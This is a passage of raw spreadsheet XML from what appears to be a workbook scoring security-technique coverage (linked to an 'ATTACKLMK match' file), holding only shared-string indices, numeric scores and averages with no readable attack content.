        <v>387</v>
      </c>
      <c r="E212" s="11">
        <v>2</v>
      </c>
      <c r="F212" s="3" t="s">
        <v>473</v>
      </c>
      <c r="G212" s="11">
        <v>1</v>
      </c>
      <c r="H212" s="3" t="s">
        <v>469</v>
      </c>
      <c r="I212" s="11">
        <v>3</v>
      </c>
      <c r="J212" s="3" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="213" spans="1:10" ht="90" x14ac:dyDescent="0.2">
      <c r="A213" s="1" t="s">
        <v>388</v>
      </c>
      <c r="B213" s="1" t="s">
        <v>379</v>
      </c>
      <c r="C213" s="1" t="s">
        <v>380</v>
      </c>
      <c r="D213" s="1" t="s">
        <v>389</v>
      </c>
      <c r="E213" s="11">
        <v>2</v>
      </c>
      <c r="F213" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G213" s="11">
        <v>4</v>
      </c>
      <c r="H213" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I213" s="11">
        <v>3</v>
      </c>
      <c r="J213" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="214" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A214" s="1" t="s">
        <v>390</v>
      </c>
      <c r="B214" s="1" t="s">
        <v>379</v>
      </c>
      <c r="C214" s="1" t="s">
        <v>380</v>
      </c>
      <c r="D214" s="1" t="s">
        <v>391</v>
      </c>
      <c r="E214" s="11">
        <v>2</v>
      </c>
      <c r="F214" s="3" t="s">
        <v>485</v>
      </c>
      <c r="G214" s="11">
        <v>4</v>
      </c>
      <c r="H214" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I214" s="11">
        <v>3</v>
      </c>
      <c r="J214" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="215" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A215" s="1" t="s">
        <v>392</v>
      </c>
      <c r="B215" s="1" t="s">
        <v>379</v>
      </c>
      <c r="C215" s="1" t="s">
        <v>380</v>
      </c>
      <c r="D215" s="1" t="s">
        <v>393</v>
      </c>
      <c r="E215" s="11">
        <v>3</v>
      </c>
      <c r="F215" s="3" t="s">
        <v>486</v>
      </c>
      <c r="G215" s="11">
        <v>4</v>
      </c>
      <c r="H215" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I215" s="11">
        <v>3</v>
      </c>
      <c r="J215" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="216" spans="1:10" ht="90" x14ac:dyDescent="0.2">
      <c r="A216" s="1" t="s">
        <v>394</v>
      </c>
      <c r="B216" s="1" t="s">
        <v>379</v>
      </c>
      <c r="C216" s="1" t="s">
        <v>380</v>
      </c>
      <c r="D216" s="1" t="s">
        <v>395</v>
      </c>
      <c r="E216" s="11">
        <v>3</v>
      </c>
      <c r="F216" s="3" t="s">
        <v>487</v>
      </c>
      <c r="G216" s="11">
        <v>4</v>
      </c>
      <c r="H216" s="3" t="s">
        <v>488</v>
      </c>
      <c r="I216" s="11">
        <v>3</v>
      </c>
      <c r="J216" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="217" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A217" s="1" t="s">
        <v>396</v>
      </c>
      <c r="B217" s="1" t="s">
        <v>379</v>
      </c>
      <c r="C217" s="1" t="s">
        <v>380</v>
      </c>
      <c r="D217" s="1" t="s">
        <v>397</v>
      </c>
      <c r="E217" s="11">
        <v>3</v>
      </c>
      <c r="F217" s="3" t="s">
        <v>534</v>
      </c>
      <c r="G217" s="11">
        <v>4</v>
      </c>
      <c r="H217" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I217" s="11">
        <v>4</v>
      </c>
      <c r="J217" s="3" t="s">
        <v>440</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:J217" xr:uid="{292B6A43-8418-B84C-B474-BFA81B206214}"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="8" scale="3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8000ED2-B632-8B4D-98DA-110618FB93DE}">
          <x14:formula1>
            <xm:f>'https://corbioncloud-my.sharepoint.com/personal/raymond_morsman_corbion_com/Documents/[ATTACKLMK match Macbook2.xlsx]Tactics'!#REF!</xm:f>
          </x14:formula1>
          <xm:sqref>B1:C30 B54:C1048576</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{4612F295-21A9-7F40-9AA6-1F4773FBBAFB}">
          <x14:formula1>
            <xm:f>'https://corbioncloud-my.sharepoint.com/personal/raymond_morsman_corbion_com/Documents/[ATTACKLMK match.xlsx]Tactics'!#REF!</xm:f>
          </x14:formula1>
          <xm:sqref>B31:C53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6A7D7-71CE-1346-AEEF-732FB32E77C5}">
  <dimension ref="A1:F6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection sqref="A1:B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="24" customWidth="1"/>
    <col min="3" max="3" width="24" customWidth="1"/>
    <col min="5" max="5" width="24" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>405</v>
      </c>
      <c r="C1" t="s">
        <v>409</v>
      </c>
      <c r="E1" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>407</v>
      </c>
      <c r="B2">
        <v>0</v>
      </c>
      <c r="C2" t="s">
        <v>410</v>
      </c>
      <c r="D2">
        <v>0</v>
      </c>
      <c r="E2" t="s">
        <v>410</v>
      </c>
      <c r="F2">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>443</v>
      </c>
      <c r="B3">
        <v>1</v>
      </c>
      <c r="C3" t="s">
        <v>428</v>
      </c>
      <c r="D3">
        <v>1</v>
      </c>
      <c r="E3" t="s">
        <v>418</v>
      </c>
      <c r="F3">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>406</v>
      </c>
      <c r="B4">
        <v>2</v>
      </c>
      <c r="C4" t="s">
        <v>411</v>
      </c>
      <c r="D4">
        <v>2</v>
      </c>
      <c r="E4" t="s">
        <v>417</v>
      </c>
      <c r="F4">
        <v>2</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>431</v>
      </c>
      <c r="B5">
        <v>3</v>
      </c>
      <c r="C5" t="s">
        <v>412</v>
      </c>
      <c r="D5">
        <v>3</v>
      </c>
      <c r="E5" t="s">
        <v>415</v>
      </c>
      <c r="F5">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>408</v>
      </c>
      <c r="B6">
        <v>4</v>
      </c>
      <c r="C6" t="s">
        <v>413</v>
      </c>
      <c r="D6">
        <v>4</v>
      </c>
      <c r="E6" t="s">
        <v>416</v>
      </c>
      <c r="F6">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0E8F4-BB3F-5F40-928B-A1FA0C0CE5AF}">
  <dimension ref="A3:D17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E3" sqref="E3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="23.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="20" style="8" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="21.1640625" style="8" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21.5" style="8" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>582</v>
      </c>
      <c r="B3" s="8" t="s">
        <v>583</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>584</v>
      </c>
      <c r="D3" s="8" t="s">
        <v>585</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4" s="7" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="12">
        <v>1.5333333333333334</v>
      </c>
      <c r="C4" s="12">
        <v>0.93333333333333335</v>
      </c>
      <c r="D4" s="12">
        <v>2.0666666666666669</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5" s="7" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="12">
        <v>1.7142857142857142</v>
      </c>
      <c r="C5" s="12">
        <v>0.7857142857142857</v>
      </c>
      <c r="D5" s="12">
        <v>7.1428571428571425E-2</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6" s="7" t="s">
        <v>245</v>
      </c>
      <c r="B6" s="12">
        <v>1.6190476190476191</v>
      </c>
      <c r="C6" s="12">
        <v>0.26190476190476192</v>
      </c>
      <c r="D6" s="12">
        <v>0.61904761904761907</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7" s="7" t="s">
        <v>380</v>
      </c>
      <c r="B7" s="12">
        <v>2.7777777777777777</v>
      </c>
      <c r="C7" s="12">
        <v>3</v>
      </c>
      <c r="D7" s="12">
        <v>3.2222222222222223</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="12">
        <v>2.0769230769230771</v>
      </c>
      <c r="C8" s="12">
        <v>0.38461538461538464</v>
      </c>
      <c r="D8" s="12">
        <v>0.84615384615384615</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9" s="7" t="s">
        <v>227</v>
      </c>
      <c r="B9" s="12">
        <v>1.6111111111111112</v>
      </c>
      <c r="C9" s="12">
        <v>0.16666666666666666</v>
      </c>
      <c r="D9" s="12">
        <v>0.27777777777777779</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10" s="7" t="s">
        <v>9</v>
      </c>
      <c r="B10" s="12">
        <v>1.25</v>
      </c>
      <c r="C10" s="12">
        <v>0</v>
      </c>
      <c r="D10" s="12">
        <v>0.125</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11" s="7" t="s">
        <v>569</v>
      </c>
      <c r="B11" s="12">
        <v>2.5714285714285716</v>
      </c>
      <c r="C11" s="12">
        <v>3</v>
      </c>
      <c r="D11" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12" s="7" t="s">
        <v>189</v>
      </c>
      <c r="B12" s="12">
        <v>1.7777777777777777</v>
      </c>
      <c r="C12" s="12">
        <v>3.2222222222222223</v>
      </c>
      <c r="D12" s="12">
        <v>1.0555555555555556</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13" s="7" t="s">
        <v>570</v>
      </c>
      <c r="B13" s="12">
        <v>2.8</v>
      </c>
      <c r="C13" s="12">
        <v>2.4</v>
      </c>
      <c r="D13" s="12">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14" s="7" t="s">
        <v>70</v>
      </c>
      <c r="B14" s="12">
        <v>2.1363636363636362</v>
      </c>
      <c r="C14" s="12">
        <v>0.31818181818181818</v>
      </c>
      <c r="D14" s="12">
        <v>1.3636363636363635</v>
      </c>
    </row>
    <row r="15" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15" s="7" t="s">
        <v>116</v>
      </c>
      <c r="B15" s="12">
        <v>2.1052631578947367</v>
      </c>
      <c r="C15" s="12">
        <v>0.5</v>
      </c>
      <c r="D15" s="12">
        <v>0.31578947368421051</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A16" s="7" t="s">
        <v>572</v>
      </c>
      <c r="B16" s="12"/>
      <c r="C16" s="12"/>
      <c r="D16" s="12"/>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17" s="7" t="s">
        <v>573</v>
      </c>
      <c r="B17" s="12">
        <v>1.8755760368663594</v>
      </c>
      <c r="C17" s="12">
        <v>0.86635944700460832</v>
      </c>
      <c r="D17" s="12">
        <v>0.79723502304147464</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting pivot="1" sqref="B4:D15">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3CF65-799C-4842-A862-55B927248200}">
  <sheetPr>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:I218"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A55" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="H53" sqref="H53"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="10.83203125" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="37.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="25.33203125" style="1" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="58.33203125" style="1" customWidth="1"/>
    <col min="4" max="4" width="17.33203125" style="11" customWidth="1"/>
    <col min="5" max="5" width="54.83203125" style="3" customWidth="1"/>
    <col min="6" max="6" width="14.5" style="11" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="54.83203125" style="3" customWidth="1"/>
    <col min="8" max="8" width="14.5" style="11" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="54.83203125" style="3" customWidth="1"/>
    <col min="10" max="16384" width="10.83203125" style="3"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>574</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>398</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>399</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>400</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>401</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>402</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="2" spans="1:9" s="4" customFormat="1" ht="32" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>6</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="D2" s="10">
        <v>2</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>427</v>
      </c>
      <c r="F2" s="10">
        <v>1</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>429</v>
      </c>
      <c r="H2" s="10">
        <v>0</v>
      </c>
      <c r="I2" s="4" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="3" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D3" s="11">
        <v>1</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>434</v>
      </c>
      <c r="F3" s="11">
        <v>0</v>
      </c>
      <c r="G3" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H3" s="11">
        <v>0</v>
      </c>
      <c r="I3" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="4" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D4" s="11">
        <v>0</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>441</v>
      </c>
      <c r="F4" s="11">
        <v>0</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H4" s="11">
        <v>2</v>
      </c>
      <c r="I4" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="5" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>16</v>
      </c>
      <c r="D5" s="11">
        <v>2</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>495</v>
      </c>
      <c r="F5" s="11">
        <v>0</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H5" s="11">
        <v>2</v>
      </c>
      <c r="I5" s="3" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="6" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>18</v>
      </c>
      <c r="D6" s="11">
        <v>2</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F6" s="11">
        <v>0</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H6" s="11">
        <v>0</v>
      </c>
      <c r="I6" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="7" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D7" s="11">
        <v>2</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F7" s="11">
        <v>0</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H7" s="11">
        <v>0</v>
      </c>
      <c r="I7" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="8" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>22</v>
      </c>
      <c r="D8" s="11">
        <v>2</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>511</v>
      </c>
      <c r="F8" s="11">
        <v>0</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H8" s="11">
        <v>0</v>
      </c>
      <c r="I8" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="9" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>24</v>
      </c>
      <c r="D9" s="11">
        <v>2</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F9" s="11">
        <v>0</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H9" s="11">
        <v>0</v>
      </c>
      <c r="I9" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="10" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>26</v>
      </c>
      <c r="D10" s="11">
        <v>2</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F10" s="11">
        <v>0</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H10" s="11">
        <v>0</v>
      </c>
      <c r="I10" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="11" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>28</v>
      </c>
      <c r="D11" s="11">
        <v>2</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F11" s="11">
        <v>0</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H11" s="11">
        <v>0</v>
      </c>
      <c r="I11" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="12" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>30</v>
      </c>
      <c r="D12" s="11">
        <v>1</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F12" s="11">
        <v>0</v>
      </c>
      <c r="G12" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H12" s="11">
        <v>0</v>
      </c>
      <c r="I12" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="13" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>32</v>
      </c>
      <c r="D13" s="11">
        <v>2</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>459</v>
      </c>
      <c r="F13" s="11">
        <v>0</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H13" s="11">
        <v>0</v>
      </c>
      <c r="I13" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="14" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>34</v>
      </c>
      <c r="D14" s="11">
        <v>0</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>529</v>
      </c>
      <c r="F14" s="11">
        <v>0</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H14" s="11">
        <v>0</v>
      </c>
      <c r="I14" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="15" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>36</v>
      </c>
      <c r="D15" s="11">
        <v>1</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F15" s="11">
        <v>0</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H15" s="11">
        <v>0</v>
      </c>
      <c r="I15" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="16" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>38</v>
      </c>
      <c r="D16" s="11">
        <v>1</v>
      </c>
      <c r="E16" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F16" s="11">
        <v>0</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H16" s="11">
        <v>0</v>
      </c>
      <c r="I16" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="17" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D17" s="11">
        <v>1</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F17" s="11">
        <v>0</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H17" s="11">
        <v>0</v>
      </c>
      <c r="I17" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="18" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>41</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>42</v>
      </c>
      <c r="D18" s="11">
        <v>1</v>
      </c>
      <c r="E18" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F18" s="11">
        <v>0</v>
      </c>
      <c r="G18" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H18" s="11">
        <v>0</v>
      </c>
      <c r="I18" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="19" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>43</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>44</v>
      </c>
      <c r="D19" s="11">
        <v>1</v>
      </c>
      <c r="E19" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F19" s="11">
        <v>0</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H19" s="11">
        <v>0</v>
      </c>
      <c r="I19" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="20" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>45</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>46</v>
      </c>
      <c r="D20" s="11">
        <v>1</v>
      </c>
      <c r="E20" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F20" s="11">
        <v>0</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H20" s="11">
        <v>0</v>
      </c>
      <c r="I20" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="21" spans="1:9" ht="409.5" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>47</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>50</v>
      </c>
      <c r="D21" s="11">
        <v>2</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>480</v>
      </c>
      <c r="F21" s="11">
        <v>4</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H21" s="11">
        <v>0</v>
      </c>
      <c r="I21" s="3" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="22" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>51</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>52</v>
      </c>
      <c r="D22" s="11">
        <v>2</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>490</v>
      </c>
      <c r="F22" s="11">
        <v>4</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H22" s="11">
        <v>0</v>
      </c>
      <c r="I22" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="23" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>53</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>54</v>
      </c>
      <c r="D23" s="11">
        <v>4</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>500</v>
      </c>
      <c r="F23" s="11">
        <v>4</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>501</v>
      </c>
      <c r="H23" s="11">
        <v>2</v>
      </c>
      <c r="I23" s="3" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="24" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>55</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>56</v>
      </c>
      <c r="D24" s="11">
        <v>4</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>531</v>
      </c>
      <c r="F24" s="11">
        <v>4</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>532</v>
      </c>
      <c r="H24" s="11">
        <v>3</v>
      </c>
      <c r="I24" s="3" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="25" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>57</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>58</v>
      </c>
      <c r="D25" s="11">
        <v>4</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>539</v>
      </c>
      <c r="F25" s="11">
        <v>4</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>540</v>
      </c>
      <c r="H25" s="11">
        <v>0</v>
      </c>
      <c r="I25" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="26" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>59</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>60</v>
      </c>
      <c r="D26" s="11">
        <v>2</v>
      </c>
      <c r="E26" s="3" t="s">
        <v>538</v>
      </c>
      <c r="F26" s="11">
        <v>4</v>
      </c>
